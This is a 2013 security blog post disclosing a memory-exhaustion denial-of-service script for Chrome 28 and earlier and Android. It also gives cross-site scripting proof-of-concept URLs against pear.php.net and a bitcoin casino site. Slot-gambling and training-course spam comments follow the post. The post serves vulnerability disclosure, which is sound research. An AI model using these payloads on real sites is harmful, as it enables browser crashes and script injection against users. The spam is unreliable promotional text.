Monday, July 22, 2013

In the meantime...

Recently, when I have some spare time, I'm finishing my own project which I hope to release soon. However, apart from that project I have also found:

  • Google Chrome <= 28 DoS (by memory exhaustion) using history.pushState
    <script>
var r="BOMB!";for(var e=0;e<22;e++){r+=r;}
for(var d=0;d<100000;d++) {
        history.pushState({},r);
}
</script>
    Live demo

    On android 4.2.2 @ nexus 7 this is quicker: 
    <script>
var r="";for(var e=0;e<1000000;e++){r+=String.fromCharCode(1+Math.floor(Math.random()*254));}
history.pushState({},r,r);
</script>

  • pear.php.net XSS

    http://pear.php.net/support/lists.php (Email parameter was neither validated nor sanitized)

  • satoshiroulette.com (bitcoin casino) XSS :

    Examples:

    http://satoshiroulette.com/game-info.php?mode=BTC&game=%3C/title%3E%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E

    http://satoshiroulette.com/render_address_roulette.php?mode=BTC&game=%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E
Posted by at
Labels: , , ,

7 comments:

  1. newinMay 27, 2022 at 11:13 AM

    รีวิวเกมสล็อตอัพเดตล่าสุด Age of Huracan ชมชนเผ่ามายา อีกหนึ่งวิดีโอสล็อตที่ได้รับการยอมรับจากนักพนันมากมาย https://www.megaslot.game/ ที่มาพร้อมกับฟังก์ชั่นการทำเงินก้อนโต

    ReplyDelete
  2. PhuwadonJuly 12, 2022 at 9:34 AM

    Try Slots ทดลองเล่นสล็อต คลิกที่นี้ with the most popular PG faction. No.1 online slot machine website, easy to play, 100% real money, come play demo with us today. Win many prizes Ready to get free credits to play slots games with the team. Happy to give advice 24 hours a day, even on holidays, can come and play all day without getting bored.

    ReplyDelete
  3. slot pg 123December 12, 2023 at 8:16 AM

    slot pg 123 เกมของทางค่าย pg slot นี้เรียกว่าจัดหนักจัดเต็มกันทุกเกมที่ออกมาเลยเพราะเหตุว่ามีเกมให้เลือกเล่นมากมายมากยิ่งกว่า100รายการเกม ทำให้ผู้เล่นต่างชอบใจเกมของทาง pgslot

    ReplyDelete
  4. zeed slot168December 12, 2023 at 8:16 AM

    zeed slot168 ของพวกเรา วันนี้สามารถ ช่วยเพิ่มเดิมพันที่เหมาะสมที่สุด ให้กับนักร้องเพลงทุกคน pg slot สำหรับเพื่อการเลือกเข้าใช้บริการตรงนี้ กันแน่ๆ ค้ำประกันได้เลยว่าการสร้างรายได้

    ReplyDelete
  5. pg slot99thMarch 20, 2024 at 7:41 AM

    pg slot99th โบนัส แจกฟรี เป็นแพลตฟอร์มเกมสล็อตออนไลน์ที่ได้รับความนิยมในประเทศไทย โดยเน้นให้บริการเกม สล็อต ที่มีคุณภาพและหลากหลายตั้งแต่เกมสล็อตดั้งเดิมไปจนถึงเกมสล็อตที่เรียกว่าสุดล้ำ

    ReplyDelete
  6. vrMarch 11, 2026 at 3:59 PM

    Interesting read! devops and aws training
    improves collaboration and speeds up software delivery. Our course teaches modern DevOps practices and tools with practical industry-based scenarios.

    ReplyDelete
  7. NikhilMarch 16, 2026 at 9:46 AM

    AI training provides structured learning for individuals interested in building intelligent software solutions. It explains topics such as supervised and unsupervised learning, neural networks, and AI tools used for real-world development. This ai training helps learners gain practical knowledge through exercises and assignments. Students work on projects that demonstrate how AI models analyze data and produce predictions. The training prepares learners for professional roles in artificial intelligence and machine learning fields.

    ReplyDelete

Subscribe to: Post Comments (Atom)